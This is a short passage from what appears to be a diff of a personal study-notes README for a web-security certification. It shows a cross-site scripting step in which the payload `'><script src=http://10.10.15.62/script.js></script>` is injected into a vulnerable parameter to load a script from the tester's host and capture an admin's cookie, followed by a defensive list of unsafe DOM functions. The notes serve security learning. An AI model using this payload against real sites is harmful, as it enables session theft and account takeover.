Yashh-G/CWES-Notes/README.md

 ?>`

 3. use this payload in the vulnerable parameter `'><script src=http://10.10.15.62/script.js></script>` then in the terminal we will receive an cookie of the admin
+4. we should avoid using JavaScript functions that allow changing raw text of HTML fields, like:
+`DOM.innerHTML, DOM.outerHTML, document.write(), document.writeln(), document.domain`